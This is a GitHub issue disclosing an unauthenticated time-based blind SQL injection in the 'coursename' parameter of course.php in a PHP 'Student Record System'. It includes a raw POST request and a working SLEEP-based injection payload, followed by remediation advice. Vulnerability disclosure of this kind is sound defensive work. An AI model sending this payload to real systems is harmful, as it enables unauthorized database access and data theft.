Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

# code-projects.org"Student Record System" in PHP 1.0 "course.php" SQL injection #15

Open
sorryheleo opened this issue Sep 20, 2024 · 0 comments

Comments

@sorryheleo
Copy link

code-projects.org"Student Record System" in PHP 1.0 "course.php" SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Student Record System In PHP With Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • xxxx

Vulnerable File

  • course.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'course.php ' file of the 'Student Record System' project. The reason for this issue is that attackers inject malicious code from the parameter "coursename" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of the PHP "Student Record System", "xxx" discovered a critical SQL injection vulnerability in the "course.php " file. This vulnerability stems from insufficient user input validation of the "coursename" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC


POST /course.php HTTP/1.1
Host: 192.168.1.116:131
Content-Length: 82
Cache-Control: max-age=0
Origin: http://192.168.1.116:131
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.116:131/course.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip
Connection: keep-alive

coursecode=ENGLISH+001&coursename=1&sessionname=2019-2020&semestername=1st&submit=


Vulnerability type:

  • time-based blind

Vulnerability location:

  • 'coursename' parameter

Payload:


Parameter: coursename (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: coursecode=ENGLISH 001&coursename=1' AND (SELECT 3435 FROM (SELECT(SLEEP(5)))SXqZ) AND 'bPdE'='bPdE&sessionname=2019-2020&semestername=1st&submit=

  • 1

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

  • 2

  • 3

  • 4

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant